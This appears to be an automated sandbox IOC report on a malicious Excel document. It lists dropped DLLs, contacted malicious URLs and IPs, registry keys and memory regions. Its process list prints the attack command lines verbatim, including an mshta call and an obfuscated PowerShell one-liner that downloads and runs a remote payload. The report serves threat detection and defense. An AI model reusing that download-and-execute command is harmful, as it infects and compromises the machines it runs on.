IOC Report

loading gif

Files

File Path
Type
Category
Malicious
2022-28-01_1202.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
initial sample
malicious
C:\ProgramData\JooSee.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\Desktop\2022-28-01_1202.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
data
downloaded
C:\Users\user\AppData\Local\Temp\32E3.tmp
Composite Document File V2 Document, Cannot read section info
dropped
C:\Users\user\AppData\Local\Temp\~DF1BB61ECC9B3BBC2F.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF6B21B165CF142C7.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SB1XCP0W8QF39BX3SXV1.temp
data
dropped
C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\cmd.exe
CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
malicious
C:\Windows\System32\mshta.exe
mshta http://91.240.118.172/gg/ff/fe.html
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",ZIMElQfgS
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vkgzbyhfrraf\kkeql.uvv",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",zrvqzkK
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ycuydicj\gmnn.kvd",DllRegisterServer
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",vtyiOTNVC
malicious
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Glljiacvqavadds\bppnvnegw.hzh",DllRegisterServer
malicious
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://maxtdeveloper.com/okw9yx/
unknown
malicious
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/
unknown
malicious
http://91.240.118.172/gg/ff/fe.html4
unknown
malicious
http://it-o.biz/bitrix/xoDdDe/PE3
unknown
malicious
http://www.inablr.com/elenctic/f
unknown
malicious
http://totalplaytuxtla.com/sitio/DgktL3zd/PE3
unknown
malicious
http://hostfeeling.com/wp-admin/
unknown
malicious
http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3
unknown
malicious
https://property-eg.com/mlzkir/97v/
unknown
malicious
http://91.240.11
unknown
malicious
http://91.240.118.172/gg/ff/fe.png
91.240.118.172
malicious
http://91.240.118.172/gg/ff/fe.pngPE3
unknown
malicious
http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3
unknown
malicious
http://bimesarayenovin.ir/wp-adm
unknown
malicious
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html
unknown
malicious
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/
unknown
malicious
http://hostfeeling.com
unknown
malicious
http://daisy.sukoburu-secure.com
unknown
malicious
http://it-o.biz/
unknown
malicious
http://jurnalpjf.lan.go.id/assets/iM/
103.206.244.105
malicious
http://activetraining.sytes.net/
unknown
malicious
http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3
unknown
malicious
https://gudangtasorichina.com/wp-content/GG01c/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlv
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlngs
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlmshta
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlWinSta0
unknown
malicious
http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3
unknown
malicious
https://property-eg.com/mlzkir/97v/PE3
unknown
malicious
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/
unknown
malicious
https://property-eg.com/mlzkir/9
unknown
malicious
http://91.240.118.172
unknown
malicious
http://activetraining.sytes.net/libraries/8s/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlfunction
unknown
malicious
http://maxtdeveloper.com/okw9yx/Gc28ZX/
unknown
malicious
http://it-o.biz/bitrix/xoDdDe/
unknown
malicious
https://gudangtasorichina.com/wp-content/GG01c/
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlY
unknown
malicious
http://totalplaytuxtla.com/sitio/DgktL3zd/
unknown
malicious
http://activetraining.sytes.net/libraries/8s/
unknown
malicious
http://91.240.118.172/gg/ff/fe.p
unknown
malicious
http://gardeningfilm.com/wp-cont
unknown
malicious
http://jurnalpjf.lan.go.id/assets/iM/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlB
unknown
malicious
http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3
unknown
malicious
http://bimesarayenovin.ir/wp-admin/G1pYGL/
unknown
malicious
http://91.240.118.172/gg/ff/fe.htmlK
unknown
malicious
http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3
unknown
malicious
http://91.240.118.172/gg/ff/fe.html
91.240.118.172
malicious
https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih
unknown
http://jurnalpjf.lan.go.id/asset
unknown
https://160.16.102.168/r
unknown
https://gudangtasorichina.com/wp
unknown
http://daisy.suk
unknown
https://160.16.102.168:80/qczEnNfFsrzyoNZZyTPVzxGYReoNlOZZRmqKBwLAih;
unknown
https://160.16.102.168/
unknown
http://jurnalpjf.lan.go.id
unknown
http://www.protware.com
unknown
http://totalplaytuxtla.com/sitio
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
There are 51 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
hostfeeling.com
164.90.147.135
malicious
jurnalpjf.lan.go.id
103.206.244.105

IPs

IP
Domain
Country
Malicious
195.154.133.20
unknown
France
malicious
185.157.82.211
unknown
Poland
malicious
212.237.17.99
unknown
Italy
malicious
79.172.212.216
unknown
Hungary
malicious
110.232.117.186
unknown
Australia
malicious
173.214.173.220
unknown
United States
malicious
212.24.98.99
unknown
Lithuania
malicious
138.185.72.26
unknown
Brazil
malicious
178.63.25.185
unknown
Germany
malicious
160.16.102.168
unknown
Japan
malicious
81.0.236.90
unknown
Czech Republic
malicious
103.75.201.2
unknown
Thailand
malicious
216.158.226.206
unknown
United States
malicious
45.118.115.99
unknown
Indonesia
malicious
51.15.4.22
unknown
France
malicious
159.89.230.105
unknown
United States
malicious
162.214.50.39
unknown
United States
malicious
200.17.134.35
unknown
Brazil
malicious
217.182.143.207
unknown
France
malicious
107.182.225.142
unknown
United States
malicious
51.38.71.0
unknown
France
malicious
45.118.135.203
unknown
Japan
malicious
50.116.54.215
unknown
United States
malicious
131.100.24.231
unknown
Brazil
malicious
46.55.222.11
unknown
Bulgaria
malicious
41.76.108.46
unknown
South Africa
malicious
173.212.193.249
unknown
Germany
malicious
45.176.232.124
unknown
Colombia
malicious
178.79.147.66
unknown
United Kingdom
malicious
212.237.5.209
unknown
Italy
malicious
162.243.175.63
unknown
United States
malicious
176.104.106.96
unknown
Serbia
malicious
207.38.84.195
unknown
United States
malicious
164.68.99.3
unknown
Germany
malicious
164.90.147.135
hostfeeling.com
United States
malicious
192.254.71.210
unknown
United States
malicious
212.237.56.116
unknown
Italy
malicious
104.168.155.129
unknown
United States
malicious
45.142.114.231
unknown
Germany
malicious
203.114.109.124
unknown
Thailand
malicious
209.59.138.75
unknown
United States
malicious
159.8.59.82
unknown
United States
malicious
129.232.188.93
unknown
South Africa
malicious
91.240.118.172
unknown
unknown
malicious
58.227.42.236
unknown
Korea Republic of
malicious
158.69.222.101
unknown
Canada
malicious
104.251.214.46
unknown
United States
malicious
103.206.244.105
jurnalpjf.lan.go.id
Indonesia
There are 38 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
b}.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2D4BC
2D4BC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
kc.
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33A52
33A52
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33FFD
33FFD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 61 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
380000
trusted library allocation
page execute and read and write
malicious
2DF1000
unkown
page execute read
malicious
29F1000
trusted library allocation
page execute read
malicious
140000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2380000
trusted library allocation
page execute and read and write
malicious
2AB1000
trusted library allocation
page execute read
malicious
27D0000
trusted library allocation
page execute and read and write
malicious
221000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
C61000
trusted library allocation
page execute read
malicious
200000
trusted library allocation
page execute and read and write
malicious
2290000
trusted library allocation
page execute and read and write
malicious
1A0000
trusted library allocation
page execute and read and write
malicious
340000
trusted library allocation
page execute and read and write
malicious
A50000
trusted library allocation
page execute and read and write
malicious
2EA0000
trusted library allocation
page execute and read and write
malicious
391000
trusted library allocation
page execute read
malicious
2261000
trusted library allocation
page execute read
malicious
2A20000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
1D0000
trusted library allocation
page execute and read and write
malicious
431000
trusted library allocation
page execute read
malicious
4B0000
trusted library allocation
page execute and read and write
malicious
3C0000
trusted library allocation
page execute and read and write
malicious
371000
trusted library allocation
page execute read
malicious
2C41000
trusted library allocation
page execute read
malicious
960000
trusted library allocation
page execute and read and write
malicious
2491000
trusted library allocation
page execute read
malicious
2E00000
trusted library allocation
page execute and read and write
malicious
2E31000
trusted library allocation
page execute read
malicious
310000
trusted library allocation
page execute and read and write
malicious
400000
trusted library allocation
page execute and read and write
malicious
2B11000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
371000
trusted library allocation
page execute read
malicious
2F91000
unkown
page execute read
malicious
2F31000
trusted library allocation
page execute read
malicious
370000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
10001000
unkown
page execute read
malicious
2AE0000
trusted library allocation
page execute and read and write
malicious
2270000
trusted library allocation
page execute and read and write
malicious
2E20000
unkown
page execute and read and write
malicious
271000
trusted library allocation
page execute read
malicious
CC1000
trusted library allocation
page execute read
malicious
22E1000
trusted library allocation
page execute read
malicious
2860000
trusted library allocation
page execute and read and write
malicious
3131000
trusted library allocation
page execute read
malicious
210000
trusted library allocation
page execute and read and write
malicious
251000
trusted library allocation
page execute read
malicious
2960000
trusted library allocation
page execute and read and write
malicious
C90000
trusted library allocation
page execute and read and write
malicious
10001000
unkown
page execute read
malicious
2A1000
trusted library allocation
page execute read
malicious
10001000
unkown
page execute read
malicious
991000
trusted library allocation
page execute read
malicious
2E90000
trusted library allocation
page execute and read and write
malicious
700000
trusted library allocation
page execute and read and write
malicious
2EE1000
trusted library allocation
page execute read
malicious
921000
trusted library allocation
page execute read
malicious
3100000
trusted library allocation
page execute and read and write
malicious
2E71000
trusted library allocation
page execute read
malicious
3A1000
trusted library allocation
page execute read
malicious
30C1000
trusted library allocation
page execute read
malicious
3F1000
trusted library allocation
page execute read
malicious
23B1000
trusted library allocation
page execute read
malicious
240000
trusted library allocation
page execute and read and write
malicious
3121000
trusted library allocation
page execute read
malicious
22E1000
trusted library allocation
page execute read
malicious
30F0000
trusted library allocation
page execute and read and write
malicious
460000
trusted library allocation
page execute and read and write
malicious
2D20000
unkown
page execute and read and write
malicious
3C0000
trusted library allocation
page execute and read and write
malicious
181000
trusted library allocation
page execute read
malicious
2B40000
trusted library allocation
page execute and read and write
malicious
521000
trusted library allocation
page execute read
malicious
421000
trusted library allocation
page execute read
malicious
2A57000
trusted library allocation
page read and write
28F0000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
10000
heap
page read and write
31E1000
trusted library allocation
page execute
10046000
unkown
page readonly
260000
trusted library allocation
page read and write
309D000
heap
page read and write
2F10000
trusted library allocation
page read and write
747C000
heap
page read and write
23C4000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
24C000
heap
page read and write
10053000
unkown
page read and write
1F80000
trusted library allocation
page read and write
268000
heap
page read and write
30D7000
heap
page read and write
24D0000
heap
page read and write
2FA8000
trusted library allocation
page read and write
E86E000
trusted library allocation
page read and write
293000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
30AC000
heap
page read and write
25B000
stack
page read and write
23C000
stack
page read and write
31AF000
stack
page read and write
2F9F000
heap
page read and write
76B0000
trusted library allocation
page read and write
778000
heap
page read and write
2A75000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
7488000
heap
page read and write
2FEA000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
7FF0003C000
trusted library allocation
page execute and read and write
2414000
trusted library allocation
page read and write
23A2000
trusted library allocation
page read and write
377000
heap
page read and write
30C4000
heap
page read and write
3AD8000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
2F33000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
2FBB000
trusted library allocation
page read and write
21A000
stack
page read and write
301D000
heap
page read and write
3006000
heap
page read and write
76B0000
trusted library allocation
page read and write
3AD8000
trusted library allocation
page read and write
494C000
heap
page read and write
2500000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
2A8000
heap
page read and write
2E3E000
trusted library allocation
page read and write
4BD000
heap
page read and write
23F1000
trusted library allocation
page read and write
3074000
heap
page read and write
23F8000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
1AC70000
trusted library allocation
page read and write
35BE000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page execute
10000000
unkown
page readonly
23F1000
trusted library allocation
page read and write
3077000
heap
page read and write
2A57000
trusted library allocation
page read and write
3AD000
heap
page read and write
2E0F000
stack
page read and write
308A000
heap
page read and write
10046000
unkown
page readonly
2DF0000
unkown
page read and write
2E62000
trusted library allocation
page read and write
3ABE000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
8E6E000
trusted library allocation
page read and write
279000
heap
page read and write
2369000
trusted library allocation
page read and write
295F000
stack
page read and write
23F8000
trusted library allocation
page read and write
42D000
heap
page read and write
2E3E000
trusted library allocation
page read and write
30C4000
heap
page read and write
23D4000
trusted library allocation
page read and write
3AB3000
trusted library allocation
page read and write
2E3C000
trusted library allocation
page read and write
110000
heap
page read and write
4910000
heap
page read and write
76A4000
trusted library allocation
page read and write
2F55000
trusted library allocation
page read and write
2B2B000
trusted library allocation
page read and write
2EA3000
trusted library allocation
page read and write
2B3A000
trusted library allocation
page read and write
894E000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
3F7000
heap
page read and write
3AE2000
trusted library allocation
page read and write
30AF000
heap
page read and write
2C4D000
trusted library allocation
page read and write
380000
heap
page read and write
3AD8000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
309C000
heap
page read and write
10057000
unkown
page read and write
2B3D000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
343B000
trusted library allocation
page read and write
2A49000
trusted library allocation
page read and write
31B0000
trusted library allocation
page read and write
2B2C000
trusted library allocation
page read and write
1FB000
stack
page read and write
30AF000
heap
page read and write
2F90000
unkown
page read and write
23F8000
trusted library allocation
page read and write
8EFE000
trusted library allocation
page read and write
3071000
heap
page read and write
76A4000
trusted library allocation
page read and write
4B1000
heap
page read and write
29D0000
heap
page execute and read and write
2B39000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
22A0000
heap
page read and write
33A0000
unkown
page read and write
241E000
stack
page read and write
3AEF000
trusted library allocation
page read and write
748000
heap
page read and write
3A5D000
trusted library allocation
page read and write
2314000
heap
page read and write
3AEF000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
10053000
unkown
page read and write
2417000
trusted library allocation
page read and write
3AEF000
trusted library allocation
page read and write
2C4D000
trusted library allocation
page read and write
29D4000
heap
page read and write
2B38000
trusted library allocation
page read and write
7D5000
heap
page read and write
849E000
trusted library allocation
page read and write
9B000
stack
page read and write
3118000
trusted library allocation
page read and write
2C4B000
trusted library allocation
page read and write
2A57000
trusted library allocation
page read and write
370000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
30B1000
heap
page read and write
412000
heap
page read and write
4B1000
heap
page read and write
7FF00170000
trusted library allocation
page execute and read and write
1CC10000
heap
page read and write
7FF00200000
trusted library allocation
page read and write
3B10000
trusted library allocation
page read and write
51E000
stack
page read and write
23F1000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
243000
trusted library allocation
page read and write
3740000
trusted library allocation
page read and write
910E000
trusted library allocation
page read and write
2E98000
trusted library allocation
page read and write
2F10000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
A80000
heap
page read and write
30DE000
stack
page read and write
30C2000
heap
page read and write
3AC1000
trusted library allocation
page read and write
76A4000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
2E53000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
10057000
unkown
page read and write
436000
heap
page read and write
371B000
stack
page read and write
76A4000
trusted library allocation
page read and write
710000
heap
page read and write
2B22000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
2304000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
2FB3000
unkown
page read and write
30E0000
trusted library allocation
page read and write
2FE0000
heap
page read and write
387C000
stack
page read and write
200000
heap
page read and write
2417000
trusted library allocation
page read and write
894E000
trusted library allocation
page read and write
10057000
unkown
page read and write
2ADD000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page read and write
2328000
trusted library allocation
page read and write
254000
heap
page read and write
3AB0000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
2B32000
trusted library allocation
page read and write
244000
trusted library allocation
page read and write
3B10000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
2ADD000
trusted library allocation
page read and write
3880000
heap
page read and write
452000
heap
page read and write
34E8000
trusted library allocation
page read and write
438000
heap
page read and write
30D7000
heap
page read and write
4BF000
heap
page read and write
2FA0000
trusted library allocation
page read and write
2990000
heap
page execute and read and write
8D3E000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
2C07000
heap
page read and write
2F30000
trusted library allocation
page read and write
548000
heap
page read and write
452000
heap
page read and write
1B3F0000
trusted library allocation
page read and write
2D0000
heap
page read and write
23F8000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
2F69000
heap
page read and write
2220000
heap
page read and write
393000
trusted library allocation
page read and write
1E0000
heap
page read and write
B3F000
stack
page read and write
76A4000
trusted library allocation
page read and write
2B33000
trusted library allocation
page read and write
7698000
trusted library allocation
page read and write
30B5000
heap
page read and write
2414000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
2E0000
trusted library allocation
page read and write
76B0000
trusted library allocation
page read and write
1BC7E000
stack
page read and write
8EFE000
trusted library allocation
page read and write
4BE000
heap
page read and write
2414000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page read and write
23F1000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
3A5D000
trusted library allocation
page read and write
480000
heap
page read and write
2C4B000
trusted library allocation
page read and write
3ADA000
trusted library allocation
page read and write
23F8000
trusted library allocation
page read and write
31D3000
trusted library allocation
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
453000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
2A75000
trusted library allocation
page read and write
2414000
trusted library allocation
page read and write
3AE2000
trusted library allocation
page read and write
412000
heap
page read and write
1F00000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
2417000
trusted library allocation
page read and write
38A000
heap
page read and write
3AE2000
trusted library allocation
page read and write
12E60000
trusted library allocation
page read and write
1F00000
trusted library allocation
page read and write
2B38000
trusted library allocation
page read and write
2A46000
trusted library allocation
page read and write
23D4000
trusted library allocation
page read and write
2BD4000
trusted library allocation
page read and write
2DE0000
trusted library allocation
page read and write
3095000
heap
page read and write
3A1B000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
3543000
trusted library allocation
page read and write
